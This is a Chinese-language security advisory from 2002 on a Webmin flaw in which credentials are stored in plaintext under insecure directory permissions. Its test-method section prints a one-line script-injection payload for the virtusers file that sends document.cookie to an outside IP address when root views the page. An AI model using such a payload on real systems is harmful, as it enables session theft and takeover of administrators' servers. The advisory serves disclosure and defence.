发布日期：2002-03-22
更新日期：2002-03-25

受影响系统：

Webmin Webmin 0.93
Webmin Webmin 0.92-1
Webmin Webmin 0.92
Webmin Webmin 0.91
Webmin Webmin 0.88
Webmin Webmin 0.85
Webmin Webmin 0.80
Webmin Webmin 0.8.4
Webmin Webmin 0.8.3
Webmin Webmin 0.79
Webmin Webmin 0.78
Webmin Webmin 0.77
Webmin Webmin 0.76
Webmin Webmin 0.7
Webmin Webmin 0.6
Webmin Webmin 0.51
Webmin Webmin 0.5
Webmin Webmin 0.42
Webmin Webmin 0.41
Webmin Webmin 0.4
Webmin Webmin 0.31
Webmin Webmin 0.3
Webmin Webmin 0.22
Webmin Webmin 0.21
Webmin Webmin 0.2
Webmin Webmin 0.1

描述：

---

BUGTRAQ  ID: 4351

Webmin是一个Unix和Linux系统管理的web接口。

Webmin的验证信息以明文方式保存，如果相关文件和目录的权限设置不当就会把验证信息泄漏给本地攻击者。而Webmin恰恰存在目录权限设置不安全，详细信息请参考Bugtraq ID为4328的漏洞描述。

<*来源：Ed （ekg@tricity.wsu.edu）
  
  链接：http://archives.neohapsis.com/archives/bugtraq/2002-03/0245.html
        http://archives.neohapsis.com/archives/bugtraq/2002-03/0298.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Ed （ekg@tricity.wsu.edu）提供了如下测试方法：

把以下内容加到virtusers文件，等待root用户访问该页面就可能得到验证信息：

</tt></a></td><tt><td><script>/* */document.write'<img>src="http://192.168.40.1/'+document.cookie+'">');</script>



建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 相关文件和目录设置严格正确的权限属性。

厂商补丁：

Webmin
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.webmin.com/webmin/



浏览次数：3489
严重程度：0（网友投票）